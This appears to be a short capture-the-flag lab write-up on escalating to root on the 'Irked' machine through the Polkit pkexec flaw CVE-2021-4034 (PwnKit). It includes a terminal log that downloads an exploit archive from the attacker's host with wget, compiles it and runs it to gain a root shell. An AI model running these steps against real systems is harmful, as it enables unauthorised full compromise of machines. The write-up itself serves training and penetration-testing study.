InfoSec LAB

Irked_Privilege_Escalation

Created: 2 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034 The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit):

I Found an exploit online

Exploitation

ircd@irked:/dev/shm$ wget http://10.10.14.10:8000/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
 CVE-2021-4034.tar.gz ; cd CVE-2021-403434.tar.gz ; tar -xf 
--2023-01-24 15:00:20--  http://10.10.14.10:8000/CVE-2021-4034.tar.gz
connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 40790 (40K) [application/gzip]
saving to: ‘CVE-2021-4034.tar.gz’
 
CVE-2021-4034.tar.g 100%[=====================>]  39.83K  --.-KB/s   in 0.05s  
 
2023-01-24 15:00:20 (728 KB/s) - ‘CVE-2021-4034.tar.gz’ saved [40790/40790]

Delivery complete

ircd@irked:/dev/shm/CVE-2021-4034$ make
make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true gconv_path=./pwnkit.so:.

Compiled

ircd@irked:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
irked
# ifconfig
ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:b9:3e:78  
          inet addr:10.10.10.117  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:3e78/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:3e78/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:200550 errors:0 dropped:119 overruns:0 frame:0
          tx packets:195783 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:32923605 (31.3 MiB)  TX bytes:65672065 (62.6 MiB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:65536  Metric:1
          rx packets:229 errors:0 dropped:0 overruns:0 frame:0
          tx packets:229 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:20217 (19.7 KiB)  TX bytes:20217 (19.7 KiB)

System Level Compromise

Interactive Graph View

Backlinks